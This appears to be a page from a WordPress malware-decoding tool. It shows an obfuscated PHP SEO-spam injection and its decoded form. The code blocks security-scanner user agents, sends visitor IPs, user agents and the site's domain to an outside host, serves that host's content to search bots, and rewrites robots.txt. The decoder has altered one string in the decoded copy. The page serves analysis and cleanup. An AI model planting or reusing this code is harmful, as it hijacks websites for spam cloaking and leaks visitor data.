De-obfuscate PHP malware/viruses and tampering code on Wordpress to original readable code.
*Please note that not all obfuscation codes can be decoded.<?php $xavr='gtell.co';$hvfi='m/';$rvhu='1456.hea';$btsi='://cw';$vrkg='http';$etau='rin';$wrori=$vrkg.$btsi.$rvhu.$etau.$xavr.$hvfi; $pc = "VgZQAQc"; $bagent = "Docomo|Bing|Yahoo|Google"; error_reporting(0); if(preg_match("/(EasouSpider|universalFeedParser|SeznamBot|CrawlDaddy|indy Library|feedly|httpClient|ezooms|python-requests|SemrushBot|CensysInspect|yySpider|ApacheBench|YandexBot|DataForSEO|LightDeckReports Bot|AmazonBot|Barkrowler|AhrefsBot|CoolpadWebkit|ZmEu|feedDemon|Python|yisouSpider|Python-urllib|GPTBot|AskTbFXTV|Mj12bot|scrapy|Jaunty|DigExt|swiftbot|Go-http-client|paloaltonetworks|petalBot|java|heritrix|OBot|Bytespider|DotBot|JikeSpider)/i", $_SERVER['HTTP_USER_AGENT'])) { header('HTTP/1.0 403 Forbidden'); exit(); } $refer = urlencode(@$_SERVER['HTTP_REFERER']); $uagent = urlencode($_SERVER['HTTP_USER_AGENT']); $language = urlencode(@$_SERVER['HTTP_ACCEPT_LANGUAGE']); $ip = $_SERVER['REMOTE_ADDR']; if (isset($_SERVER['HTTP_CLIENT_IP'])) { $ip = $_SERVER['HTTP_CLIENT_IP']; } elseif (isset($_SERVER['HTTP_X_FORWARDED_FOR'])) { $ip = $_SERVER['HTTP_X_FORWARDED_FOR']; } $ip = urlencode($ip); $domain = urlencode($_SERVER['HTTP_HOST']); $script = urlencode($_SERVER['SCRIPT_NAME']); if ((!empty($_SERVER['REQUEST_SCHEME']) and $_SERVER['REQUEST_SCHEME'] == 'https') or (!empty($_SERVER['HTTPS']) and $_SERVER['HTTPS'] == 'on') or (!empty($_SERVER['SERVER_PORT']) and $_SERVER['SERVER_PORT'] == '443') or (isset($_SERVER['HTTP_X_FORWARDED_PROTO']) and $_SERVER['HTTP_X_FORWARDED_PROTO'] == 'https')) { $_SERVER['REQUEST_SCHEME'] = 'https'; } else { $_SERVER['REQUEST_SCHEME'] = 'http'; } $http = urlencode($_SERVER['REQUEST_SCHEME']); $uri = urlencode($_SERVER['REQUEST_URI']); if(strpos($uri,"hachac") !== false){echo "ok";exit();} $hac = 0; $hacFilePath = "hac.txt"; if(!is_file($hacFilePath)) { $uuu = $http.'://'.$_SERVER['HTTP_HOST'].'/hachac'; $liyn = @file_get_contents($uuu); if($liyn === "ok") { $hac = 1; writeToFile($hacFilePath,"1"); } else { $hac = 0; writeToFile($hacFilePath,"0"); } } else { $hac = readFromFile($hacFilePath); } function writeToFile($filePath, $content) { $file = fopen($filePath, "w"); if ($file) { fwrite($file, $content); fclose($file); return true; } return false; } function readFromFile($filePath) { $file = fopen($filePath, "r"); if ($file) { $content = fread($file, filesize($filePath)); fclose($file); return $content; } return false; } if(strpos($uri,"favicon.ico") !== false) { } else if(strpos($uri,"robots.txt") !== false or strpos($uri,"pingsitemap") !== false or strpos($uri,"jp2023") !== false or preg_match("@^/(.*?).xml$@i", $_SERVER['REQUEST_URI']) or preg_match("/($bagent)/i", $_SERVER['HTTP_USER_AGENT']) or preg_match("/($bagent)/i", $_SERVER['HTTP_REFERER'])) { $requsturl = $wrori."?agent=$uagent&refer=$refer&lang=$language&ip=$ip&dom=$domain&http=$http&uri=$uri&pc=$pc&rewriteable=$hac&script=$script"; $robots_contents = ""; if(strpos($uri,"pingsitemap") !== false) { $scripname = $_SERVER['SCRIPT_NAME']; if(strpos($scripname,"index.ph") !== false) { if($hac == 0) { $scripname = '/?'; } else { $scripname = '/'; } } else { $scripname = $scripname.'?'; } $robots_contents = "User-agent: *\r\nAllow: /"; $sitemap = "$http://" . $domain .$scripname. "sitemap.xml"; $robots_contents = trim($robots_contents)."\r\n"."Sitemap: $sitemap"; $sitemapstatus = ""; echo $sitemap.": ".$sitemapstatus.'<br/>'; $requsturl = $wrori."?agent=$uagent&refer=$refer&lang=$language&ip=$ip&dom=$domain&http=$http&uri=$uri&pc=$pc&rewriteable=$hac&script=$script&sitemap=".urlencode($sitemap); } $liyn = @file_get_contents($requsturl); if(empty($liyn)) { $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $requsturl); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); curl_setopt($ch, CURLOPT_FOLLOWLOCATION, false); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, FALSE); curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, FALSE); $liyn = curl_exec($ch); curl_close($ch); } if(!empty($liyn)) { if(substr($liyn,0,10)=="error code"||$liyn == "500") { header("HTTP/1.0 500 Internal Server Error"); exit(); } if(strpos($uri,"jp2023") !== false){header('HTTP/1.1 404 Not Found');} else if(substr($liyn,0,5)=="<?xml") { header('Content-Type: text/xml; charset=utf-8'); } else { header('Content-Type: text/html; charset=utf-8'); } echo $liyn; if(!empty($robots_contents)){writeToFile("robots.txt",$robots_contents);} else if(strpos($uri,"robots.txt") !== false){writeToFile("robots.txt",$liyn);} exit(); return; } }else{ } ?><?php
$xavr = 'gtell.co';
$hvfi = 'm/';
$rvhu = '1456.hea';
$btsi = '://cw';
$vrkg = 'http';
$etau = 'rin';
$wrori = "http://cw1456.hearingtell.com/";
$pc = "VgZQAQc";
$bagent = "Docomo|Bing|Yahoo|Google";
error_reporting(0);
if (preg_match("/(EasouSpider|universalFeedParser|SeznamBot|CrawlDaddy|indy Library|feedly|httpClient|ezooms|python-requests|SemrushBot|CensysInspect|yySpider|ApacheBench|YandexBot|DataForSEO|LightDeckReports Bot|AmazonBot|Barkrowler|AhrefsBot|CoolpadWebkit|ZmEu|feedDemon|Python|yisouSpider|Python-urllib|GPTBot|AskTbFXTV|Mj12bot|scrapy|Jaunty|DigExt|swiftbot|Go-http-client|paloaltonetworks|petalBot|java|heritrix|OBot|Bytespider|DotBot|JikeSpider)/i", $_SERVER['HTTP_USER_AGENT'])) {
header('HTTP/1.0 403 Forbidden');
exit;
}
$refer = urlencode(@$_SERVER['HTTP_REFERER']);
$uagent = urlencode($_SERVER['HTTP_USER_AGENT']);
$language = urlencode(@$_SERVER['HTTP_ACCEPT_LANGUAGE']);
$ip = $_SERVER['REMOTE_ADDR'];
if (isset($_SERVER['HTTP_CLIENT_IP'])) {
$ip = $_SERVER['HTTP_CLIENT_IP'];
} elseif (isset($_SERVER['HTTP_X_FORWARDED_FOR'])) {
$ip = $_SERVER['HTTP_X_FORWARDED_FOR'];
}
$ip = urlencode($ip);
$domain = urlencode($_SERVER['HTTP_HOST']);
$script = urlencode($_SERVER['SCRIPT_NAME']);
if (!empty($_SERVER['REQUEST_SCHEME']) and $_SERVER['REQUEST_SCHEME'] == 'https' or !empty($_SERVER['HTTPS']) and $_SERVER['HTTPS'] == 'on' or !empty($_SERVER['SERVER_PORT']) and $_SERVER['SERVER_PORT'] == '443' or isset($_SERVER['HTTP_X_FORWARDED_PROTO']) and $_SERVER['HTTP_X_FORWARDED_PROTO'] == 'https') {
$_SERVER['REQUEST_SCHEME'] = 'https';
} else {
$_SERVER['REQUEST_SCHEME'] = 'http';
}
$http = urlencode($_SERVER['REQUEST_SCHEME']);
$uri = urlencode($_SERVER['REQUEST_URI']);
if (strpos($uri, "hachac") !== false) {
echo "ok";
exit;
}
$hac = 0;
$hacFilePath = "hac.txt";
if (!is_file($hacFilePath)) {
$uuu = $http . '://' . $_SERVER['HTTP_HOST'] . '/hachac';
$liyn = @file_get_contents($uuu);
if ($liyn === "ok") {
$hac = 1;
writeToFile($hacFilePath, "1");
} else {
$hac = 0;
writeToFile($hacFilePath, "0");
}
} else {
$hac = readFromFile($hacFilePath);
}
function writeToFile($filePath, $content)
{
$file = fopen($filePath, "w");
if ($file) {
fwrite($file, $content);
fclose($file);
return true;
}
return false;
}
function readFromFile($filePath)
{
$file = fopen($filePath, "r");
if ($file) {
$content = fread($file, filesize($filePath));
fclose($file);
return $content;
}
return false;
}
if (strpos($uri, "favicon.ico") !== false) {
} else {
if (strpos($uri, "robots.txt") !== false or strpos($uri, "pingsitemap") !== false or strpos($uri, "jp2023") !== false or preg_match("@^/(.*?).xml\$@i", $_SERVER['REQUEST_URI']) or preg_match("/({$bagent})/i", $_SERVER['HTTP_USER_AGENT']) or preg_match("/({$bagent})/i", $_SERVER['HTTP_REFERER'])) {
$requsturl = $wrori . "?agent={$uagent}&refer={$refer}&lang={$language}&ip={$ip}&dom={$domain}&http={$http}&uri={$uri}&pc={$pc}&rewriteable={$hac}&script={$script}";
$robots_contents = "";
if (strpos($uri, "pingsitemap") !== false) {
$scripname = $_SERVER['SCRIPT_NAME'];
if (strpos($scripname, "index.ph") !== false) {
if ($hac == 0) {
$scripname = '/?';
} else {
$scripname = '/';
}
} else {
$scripname .= '?';
}
$robots_contents = "User-agent: *\r\nAllow: /";
$sitemap = "{$http}://" . $domain . $scripname . "sitemap.xml";
$robots_contents = trim($robots_contents) . "\r\n" . "Sitemap: {$sitemap}";
$sitemapstatus = "";
echo $sitemap . ": " . $sitemapstatus . '<br/>';
$requsturl = $wrori . "?agent={$uagent}&refer={$refer}&lang={$language}&ip={$ip}&dom={$domain}&http={$http}&uri={$uri}&pc={$pc}&rewriteable={$hac}&script={$script}&sitemap=" . urlencode($sitemap);
}
$liyn = @file_get_contents($requsturl);
if (empty($liyn)) {
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $requsturl);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, false);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, FALSE);
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, FALSE);
$liyn = curl_exec($ch);
curl_close($ch);
}
if (!empty($liyn)) {
if (substr($liyn, 0, 10) == "error code" || $liyn == "500") {
header("HTTP/1.0 500 Internal Server Error");
exit;
}
if (strpos($uri, "jp2023") !== false) {
header('HTTP/1.1 404 Not Found');
} else {
if (substr($liyn, 0, 5) == "<?php xml") {
header('Content-Type: text/xml; charset=utf-8');
} else {
header('Content-Type: text/html; charset=utf-8');
}
}
echo $liyn;
if (!empty($robots_contents)) {
writeToFile("robots.txt", $robots_contents);
} else {
if (strpos($uri, "robots.txt") !== false) {
writeToFile("robots.txt", $liyn);
}
}
exit;
}
} else {
}
}Malware detection & removal plugin for WordPress
(C)2020 Wordpress Doctor All rights reserved.